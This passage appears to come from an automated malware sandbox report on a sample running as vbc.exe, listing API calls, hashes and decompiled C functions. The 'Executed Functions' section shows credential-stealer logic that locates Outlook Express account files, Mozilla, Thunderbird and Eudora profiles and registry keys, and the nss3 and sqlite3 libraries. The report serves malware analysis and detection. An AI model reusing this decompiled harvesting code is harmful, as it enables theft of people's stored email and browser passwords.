                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleEventsInputNumber$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 1600138625-0
                                                  • Opcode ID: 9fcc34ea2f84ff9568914aa8abda4b84cc77c5d200235be79e575b4beec40bd0
                                                  • Instruction ID: e4cb243bae2050902e03876274414f297d311c8eb85dcd53a0a7c62d98f20240
                                                  • Opcode Fuzzy Hash: 9fcc34ea2f84ff9568914aa8abda4b84cc77c5d200235be79e575b4beec40bd0
                                                  • Instruction Fuzzy Hash: 29E01232944015BBC7212B95EC08C49FFAAEF493613554193F805A3171EF31AC518AD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B07951, Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetConsoleMode.KERNEL32(?), ref: 00B07963
                                                  • GetLastError.KERNEL32 ref: 00B0796F
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B0797F
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • SetConsoleMode.KERNEL32(?), ref: 00B0798C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 3067319862-0
                                                  • Opcode ID: 9782301b6e1e89a32c02d2cae9085ea92532e6c2b1ae452040e09f11ceda97e2
                                                  • Instruction ID: 3c591a256a09f64593fb55c5ecf972ae82b4d158233b86dd9b40e7ea2e562c67
                                                  • Opcode Fuzzy Hash: 9782301b6e1e89a32c02d2cae9085ea92532e6c2b1ae452040e09f11ceda97e2
                                                  • Instruction Fuzzy Hash: 94E01236944015BBC7362B99EC0885EFFEAEF483613554092F80593171EF31AC528AD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B07A8D, Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?), ref: 00B07A9F
                                                  • GetLastError.KERNEL32 ref: 00B07AAB
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B07ABB
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • GetConsoleMode.KERNEL32(?), ref: 00B07AC8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 3067319862-0
                                                  • Opcode ID: b0c97d593eec53567e978bf83c93e0304c585c4539e030314df4cbc21e026825
                                                  • Instruction ID: 7361693af27c910560c3db3a1e87f1f506573fcfe37d14b2c08da76140ffe1ec
                                                  • Opcode Fuzzy Hash: b0c97d593eec53567e978bf83c93e0304c585c4539e030314df4cbc21e026825
                                                  • Instruction Fuzzy Hash: 0BE012329541197BC7212B95EC1CC4DFFAAFF483617660092F806A3171EF31AC618AD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF45A8, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00AF45B1
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00AF45C4
                                                  • _free.LIBCMT ref: 00AF45D5
                                                  • _free.LIBCMT ref: 00AF45E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: efc32d014a7b75a491572348800b9b2c5ee463c341d9d7c60a0f2048119b99bc
                                                  • Instruction ID: 96ee55bbf4d5b13b48037fbd243fd022cf27299f4f4cb0837f5066af5ea86a0f
                                                  • Opcode Fuzzy Hash: efc32d014a7b75a491572348800b9b2c5ee463c341d9d7c60a0f2048119b99bc
                                                  • Instruction Fuzzy Hash: 4EE0ECB18AD1649FDA327F74FD0296A3F61EB88B403814056F60017231CF3909579F8D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                  0x004025ba
                                                  0x004025bf
                                                  0x004025cb
                                                  0x004025d0
                                                  0x004025d5
                                                  0x004025d7
                                                  0x004025e2
                                                  0x004025d9
                                                  0x004025d9
                                                  0x00000000
                                                  0x004025d9
                                                  0x004025cd
                                                  0x004025cd
                                                  0x004025cf
                                                  0x004025cf

                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                    • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                  • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                  • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                  • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AD22A6, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00AD22A6
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00AD22AB
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00AD22B0
                                                    • Part of subcall function 00AD28F0: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00AD2901
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00AD22C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 5075125210fc87fec1f7c9cdd6bae3a90e3819cbc4af784d8874517ab46a5c51
                                                  • Instruction ID: 4a8583491a3f9cd850e6e73e8ffe6eee518d8a66c8e3543af7832eb9d78aa4fa
                                                  • Opcode Fuzzy Hash: 5075125210fc87fec1f7c9cdd6bae3a90e3819cbc4af784d8874517ab46a5c51
                                                  • Instruction Fuzzy Hash: 04C04824108602582C203BF1632A3EDB3100EF7B84B8018C3F8831770BAE06490BF773
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B05504, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00B057A5,?,00000050,?,?,?,?,?), ref: 00B055DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: ecd9c84a830eb412433e9886ebdefbc219e46d378fc0a246df86e75424a7df21
                                                  • Instruction ID: 11162890efda4646b09f74672875547a4ac698d0e002aae90f3ac5ab00a62d66
                                                  • Opcode Fuzzy Hash: ecd9c84a830eb412433e9886ebdefbc219e46d378fc0a246df86e75424a7df21
                                                  • Instruction Fuzzy Hash: 3621D862A00904A6DB348A54CD41BEB7BD7EF74B54F5644A4E90AD7A80FB32DD40CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: vbc.exe PID: 6084 Parent PID: 2148 vbc.exeCOMMON

                                                  Executed Functions

                                                  Function 0040724C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040724C(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24); // executed
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}









































                                                  0x0040725d
                                                  0x00407268
                                                  0x0040726c
                                                  0x00407270
                                                  0x00407274
                                                  0x00407278
                                                  0x0040727c
                                                  0x00407280
                                                  0x00407284
                                                  0x00407288
                                                  0x0040728c
                                                  0x00407290
                                                  0x00407294
                                                  0x00407298
                                                  0x0040729c
                                                  0x004072a0
                                                  0x004072a4
                                                  0x004072a8
                                                  0x004072ae
                                                  0x004072bc
                                                  0x004072c2
                                                  0x004072d5
                                                  0x004072dc
                                                  0x004072ea
                                                  0x004072f1
                                                  0x004072fc
                                                  0x0040730d
                                                  0x00407310
                                                  0x00407313
                                                  0x00407324
                                                  0x00407327
                                                  0x00407346
                                                  0x0040735b
                                                  0x00407369
                                                  0x00407373
                                                  0x00407378
                                                  0x0040737b
                                                  0x00407385
                                                  0x00407390
                                                  0x00407395
                                                  0x00407397
                                                  0x0040739d
                                                  0x004073a0
                                                  0x004073a6
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073b0
                                                  0x004073b3
                                                  0x004073bc
                                                  0x004073be
                                                  0x004073c5
                                                  0x004073c6
                                                  0x0040739d
                                                  0x004073ce
                                                  0x004073d0
                                                  0x004073d3
                                                  0x004073d9
                                                  0x004073df
                                                  0x004073df
                                                  0x004073e8
                                                  0x004073eb
                                                  0x004073f4
                                                  0x004073f6
                                                  0x004073f9
                                                  0x004073fa
                                                  0x004073d0
                                                  0x00407403

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                  • String ID: 5$H$O$b$i$}$}
                                                  • API String ID: 1832431107-3760989150
                                                  • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                  • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                  • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                  • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404837, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00404837(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t13;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryA("comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1; // executed
					_t13 =  *_t11( &_v12); // executed
					_t15 = _t13;
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}











                                                  0x00404844
                                                  0x0040484b
                                                  0x00404852
                                                  0x00404854
                                                  0x0040485c
                                                  0x00404860
                                                  0x0040488a
                                                  0x0040488a
                                                  0x00404892
                                                  0x00404893
                                                  0x00404898
                                                  0x004048b5
                                                  0x0040489a
                                                  0x004048a7
                                                  0x004048b0
                                                  0x004048b0
                                                  0x00404898
                                                  0x00404868
                                                  0x00404870
                                                  0x00404876
                                                  0x00404877
                                                  0x00404879
                                                  0x00404879
                                                  0x0040487c
                                                  0x00404884
                                                  0x00000000
                                                  0x00404886
                                                  0x00404886
                                                  0x00000000
                                                  0x00404886

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(comctl32.dll,74B04DE0,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 00404856
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 0040487C
                                                  • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 0040488A
                                                  • MessageBoxA.USER32 ref: 004048A7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                  • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                  • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                  • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406EC3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406EC3(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E00406F5B(_t40);
						goto L4;
					}
				} else {
					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t38 =  &(_t40[0xa2]);
						_t28 =  &(_t40[0x5d]);
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E004062AD(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}











                                                  0x00406ec5
                                                  0x00406ec7
                                                  0x00406ecc
                                                  0x00406ef7
                                                  0x00406eff
                                                  0x00406f03
                                                  0x00000000
                                                  0x00406f05
                                                  0x00406f05
                                                  0x00000000
                                                  0x00406f05
                                                  0x00406ece
                                                  0x00406ed9
                                                  0x00406ee7
                                                  0x00406ee9
                                                  0x00406f0a
                                                  0x00406f0f
                                                  0x00406f11
                                                  0x00406f14
                                                  0x00406f1a
                                                  0x00406f20
                                                  0x00406f27
                                                  0x00406f3f
                                                  0x00406f4e
                                                  0x00406f41
                                                  0x00406f45
                                                  0x00406f4b
                                                  0x00406f53
                                                  0x00406f0f
                                                  0x00406f5a

                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                  • strlen.MSVCRT ref: 00406F27
                                                  • strlen.MSVCRT ref: 00406F2F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFindstrlen$FirstNext
                                                  • String ID: rA
                                                  • API String ID: 379999529-474049127
                                                  • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                  • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                  • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                  • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401E8B, Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E00401E8B(void* __eflags, char* _a4) {
				signed int _v8;
				int _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void _v1059;
				char _v1060;
				void _v1323;
				char _v1324;
				void _v2347;
				char _v2348;
				void* __edi;
				void* __esi;
				int _t65;
				char* _t69;
				char _t70;
				int _t71;
				char _t75;
				void* _t76;
				long _t78;
				void* _t83;
				int _t85;
				void* _t87;
				int _t104;
				int _t108;
				char _t126;
				void* _t137;
				void* _t139;
				char* _t157;
				char* _t158;
				char* _t160;
				int _t161;
				void* _t164;
				CHAR* _t169;
				char* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_v540 = 0;
				memset( &_v539, 0, 0x104);
				_t164 = 0x1a;
				E0040EE59( &_v540, _t164); // executed
				_t65 = strlen("Mozilla\\Profiles");
				_t6 = strlen( &_v540) + 1; // 0x1
				_t172 = _t171 + 0x14;
				if(_t65 + _t6 >= 0x104) {
					_t69 = _a4;
					 *_t69 = 0;
					_t157 = _t69;
				} else {
					_t157 = _a4;
					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
				}
				_t70 = E0040614B(_t157);
				if(_t70 == 0) {
					 *_t157 = _t70;
				}
				_t158 = _t157 + 0x105;
				_t71 = strlen("Thunderbird\\Profiles");
				_t12 = strlen( &_v540) + 1; // 0x1
				if(_t71 + _t12 >= 0x104) {
					 *_t158 = 0;
				} else {
					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
				}
				_t75 = E0040614B(_t158);
				_pop(_t137);
				if(_t75 == 0) {
					 *_t158 = _t75;
				}
				_t160 = _a4 + 0x20a;
				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
				_t173 = _t172 + 0xc;
				if(_t76 == 0) {
					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
					_t173 = _t173 + 0xc;
					if(_t126 == 0) {
						 *_t160 = _t126;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
				_t174 = _t173 + 0xc;
				if(_t78 != 0) {
					L32:
					_t169 = _a4 + 0x30f;
					if( *_t169 != 0) {
						L35:
						return _t78;
					}
					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
					_t78 = E0040614B(_t169);
					if(_t78 != 0) {
						goto L35;
					}
					 *_t169 = _t78;
					return _t78;
				} else {
					_v796 = _t78;
					_t161 = 0;
					memset( &_v795, 0, 0xff);
					_v12 = 0;
					_t83 = E0040EC05(_v8, 0,  &_v796);
					_t175 = _t174 + 0x18;
					if(_t83 != 0) {
						L31:
						_t78 = RegCloseKey(_v8);
						goto L32;
					}
					_t170 = "sqlite3.dll";
					do {
						_t85 = atoi( &_v796);
						_pop(_t139);
						if(_t85 < 3) {
							goto L28;
						}
						_v2348 = 0;
						memset( &_v2347, _t161, 0x3ff);
						_v276 = 0;
						memset( &_v275, _t161, 0x104);
						sprintf( &_v2348, "%s\\Main",  &_v796);
						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
						_t175 = _t175 + 0x38;
						if(_v276 != 0 && E0040614B( &_v276) != 0) {
							_v1060 = 0;
							memset( &_v1059, _t161, 0x104);
							_v1324 = 0;
							memset( &_v1323, _t161, 0x104);
							_t104 = strlen(_t170);
							_t41 = strlen( &_v276) + 1; // 0x1
							_t175 = _t175 + 0x20;
							if(_t104 + _t41 >= 0x104) {
								_v1060 = 0;
							} else {
								E004062AD( &_v1060,  &_v276, _t170);
							}
							_t108 = strlen("nss3.dll");
							_t47 = strlen( &_v276) + 1; // 0x1
							if(_t108 + _t47 >= 0x104) {
								_v1324 = 0;
							} else {
								E004062AD( &_v1324,  &_v276, "nss3.dll");
							}
							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
								_t161 = 0;
								goto L28;
							} else {
								strcpy(_a4 + 0x30f,  &_v276);
								goto L31;
							}
						}
						L28:
						_v12 = _v12 + 1;
						_t87 = E0040EC05(_v8, _v12,  &_v796);
						_t175 = _t175 + 0xc;
					} while (_t87 == 0);
					goto L31;
				}
			}














































                                                  0x00401ea6
                                                  0x00401ead
                                                  0x00401eb4
                                                  0x00401ebb
                                                  0x00401ec6
                                                  0x00401ed9
                                                  0x00401edd
                                                  0x00401ee2
                                                  0x00401efa
                                                  0x00401efd
                                                  0x00401f00
                                                  0x00401ee4
                                                  0x00401ee4
                                                  0x00401ef1
                                                  0x00401ef7
                                                  0x00401f03
                                                  0x00401f0b
                                                  0x00401f0d
                                                  0x00401f0d
                                                  0x00401f14
                                                  0x00401f1a
                                                  0x00401f2d
                                                  0x00401f35
                                                  0x00401f4e
                                                  0x00401f37
                                                  0x00401f45
                                                  0x00401f4b
                                                  0x00401f52
                                                  0x00401f59
                                                  0x00401f5a
                                                  0x00401f5c
                                                  0x00401f5c
                                                  0x00401f6b
                                                  0x00401f76
                                                  0x00401f7b
                                                  0x00401f85
                                                  0x00401f92
                                                  0x00401f97
